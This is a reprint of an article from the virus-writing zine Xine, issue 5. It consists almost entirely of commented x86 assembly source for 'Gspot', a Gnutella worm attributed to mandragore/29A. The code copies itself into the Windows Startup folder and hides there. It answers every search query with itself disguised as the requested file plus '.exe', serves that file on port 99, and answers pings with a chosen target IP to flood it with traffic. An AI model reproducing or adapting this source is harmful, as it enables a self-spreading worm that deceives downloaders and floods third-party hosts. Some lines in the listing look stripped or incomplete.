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Xine - issue #5 - Phile 215

eZine's profile picture
Published in 
 · 4 May 2024


| Xine - issue #5 - Phile 215 |

comment #

most of today's file sharing apps are usin a dummy protocol
Gnetworks can be easily taken down or abused.
this worm is a -basic- proof of concept..

Gspot acts like a Gnutella client, excepts that it connects automatically
to the local Gnode to reach a Gnetwork, and then catches the search querys.
It reports a result by appending a '.exe' to the search criteria.
Its file server is running on port 99.
A lil payload is included.. It replyes to 'G-pings' by a www's IP.
This could cause -heavy- traffic on that target if this worm spreads well.
Tested with Gnutella v0.56 .

more to come later :))

-><- mandragore / 29A -><-




; main thread
lsin saddr <2,6300h,0,0>
org $-4
threads dd ?

lsock dd ?

rkey db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
rskey db 'Startup',0

; thread 1
rpacket _result <>
db 300 dup(?)
csock dd ?
csin saddr <2,0CA18h,0,0>
conask db 'GNUTELLA CONNECT/0.4',10,10
conasksz equ $-conask
conget db 'GNUTELLA OK',10,10
congetsz equ $-conget
recvd db 200 dup(?)

; thread 2
ssock dd ?
hndl dd ?
fsz dd ?
httpreq db 100 dup(?)
httphd db 'HTTP 200 OK',13,10
db 'Server: Gnutella',13,10
db 'Content-type:application/binary',13,10
db 'Content-length:'
spotsize db 24 dup(?)



;=============================== core -------------------------------------

push off lsock
push off rkey
push 80000001h
callw RegOpenKeyA
or eax,eax
jnz __bye

mov threads,500
push off threads
push off eodseg
push off rkey
push 0
push off rskey
push lsock
callw RegQueryValueExA ; get Startup folder

push lsock
callw RegCloseKey

lea esi,eodseg
mov ebp,esi
cmp al,0
jne $-3
xchg edi,esi
dec edi
mov eax,'psG\'
mov eax,''
mov eax,00006578h
push 0
push ebp
push edi

push 400
push edi
push 0
callw GetModuleFileNameA

callw CopyFileA ; copy file
or eax,eax
jz __installed ; already exists ? then run worm

push 6
push ebp
callw SetFileAttributesA ; attrib +hs, then leave
jmp __bye

mov ecx,cs
or ch,ch
jz __nt ; if NT then skip

call $+14
db 'kernel32',0
callw GetModuleHandleA
call $+28
db 'RegisterServiceProcess',0 ;...
push eax
callw GetProcAddress
mov edx,eax
callw GetCurrentProcessId
push 1
push eax
call edx

push off eodseg
push 101h
callw WSAStartup
inc eax
jz __bye

push off threads
push 0
push 0
push off connex
push 0
push 0
callw CreateThread ; fork the thread for outgoing connection

push 6
push 1
push 2
callw socket
mov lsock,eax

push 16
push off lsin
push lsock
callw bind
inc eax
jz __bye ; error handling + 'residency' checking

push 10
push lsock
callw listen

push 0
push 0
push lsock
callw accept

push off threads
push 0
push eax ; new socket as arg
push off propag
push 0
push 0
callw CreateThread ; fork to handle incoming connex

dec edx
push edx
push eax
callw WaitForSingleObject

jmp __sniff

__bye: callw WSACleanup
push 0
callw ExitProcess

sig db '[Gspot 1]',0,'freely shared by mandragore/29A',0

;----------------------------- outgoing connex

call __getip
mov csin.sip,eax ; local Gnode

push 10000
callw Sleep ; don't hammer

push csock
callw closesocket

push 6
push 1
push 2
callw socket
mov csock,eax

push 16
push off csin
push eax
callw connect
inc eax
jz connex

push 0
push conasksz
push off conask
push csock
callw send

push 0
push 100
push off recvd
push csock
callw recv
or eax,eax
jz connex
inc eax
jz connex

lea esi,conget
lea edi,recvd
mov ecx,congetsz
repz cmpsb ; connection granted ?
jecxz $+7
jmp connex

push 0
push 100
push off recvd
push csock
callw recv
or eax,eax
jz connex
inc eax
jz connex

cmp bptr [recvd.func],0
je __payload
; cmp bptr [recvd.func],40h ; to come :)
; je
cmp bptr [recvd.func],80h ; search request ?
jne __sniff

lea esi,recvd
lea edi,rpacket
mov ecx,16
rep movsb ; msg ID
mov eax,00000781h
stosd ; query_hit, ttl 7, hops 0
dec edi
lea esi,[recvd.stringz]
mov ecx,esi
cmp al,0
jne $-3
cmp bptr [esi],0
jne $-8
sub esi,ecx
xchg esi,ecx
dec ecx
push ecx ; size of request string
mov eax,ecx
add eax,41 ; 1+2+4+4+4+4+4+2+16
stosd ; size of datas

mov eax,00006301h ; 1 matching result, port 99
dec edi

call __getip

mov eax,00000200h ; 512k as bandwidth

xor eax,eax
stosd ; index

push 400
push off eodseg
push 0
callw GetModuleFileNameA
push 0
push off eodseg
callw _lopen
push eax
push 0
push eax
callw GetFileSize
mov ebp,eax
stosd ; filesize in bytes
callw _lclose
cmp ebp,-1
je __sniff
pop ecx
rep movsb ; search criteria
mov eax,'exe.'
stosd ; + ".exe"
xchg eax,ecx
stosw ; null null
mov eax,1DeadFedh
stosd ; the client ID of Gspot

push 0
mov eax,[rpacket.resz]
add eax,gheadsz+4
push eax
push off rpacket
push csock
callw send

lea edi,recvd
mov ecx,size recvd /4
xor eax,eax
rep stosd

jmp __sniff

push esi
push 150
push off eodseg
callw gethostname
push off eodseg
callw gethostbyname
mov esi,[eax.ptrAddr]
cmp bptr [esi],0
jne $-4
mov eax,[eax] ; ip of the last interface
pop esi

lea esi,recvd
lea edi,rpacket
mov ecx,16
rep movsb ; msg ID
mov eax,0000ff01h
stosd ; pong
dec edi
mov eax,14
mov ax,0050h ; port 80
mov eax,50C2E140h ; put your favorite IP here :))
mov eax,20
jmp __forkpacket

;---------------------------- file propagation

pop eax
pop [ssock]

push 0
push 100
push off httpreq
push ssock
callw recv

push 400
push off eodseg
push 0
callw GetModuleFileNameA
push 0
push off eodseg
callw _lopen
mov hndl,eax
push 0
push eax
callw GetFileSize ; ... get our size
mov fsz,eax

; eax holds the filesize
lea edi,spotsize ; ptrStr
mov ebx,10 ; radix
sub esp,24h
mov esi,esp
xor edx,edx
div ebx
mov [esi],dl
inc esi
or eax,eax ; I mostly ripped this rutine from APJ #1
jnz $-9 ; heya mammoth
dec esi
mov al,[esi] ; Computes the ascii file size for
cmp al,10 ; the http header
jl $+4
add al,cl
add al,'0'
cmp esi,esp
jg $-14
add esp,24h

mov eax,0a0d0a0dh

lea esi,httphd
sub edi,esi
push 0
push edi
push esi
push ssock
callw send ; send the pseudo HTTP/1.0 header

push fsz
push 0
callw GlobalAlloc
mov ebx,eax
push fsz
push eax ; read the file to a dyn buffer
push hndl ; small enough to not have to map the file
callw _lread
push hndl
callw _lclose

push 0
push fsz
push ebx
push ssock
callw send

push ebx
callw GlobalFree

push ssock
callw closesocket

__bye: push 0
callw ExitThread

end Start

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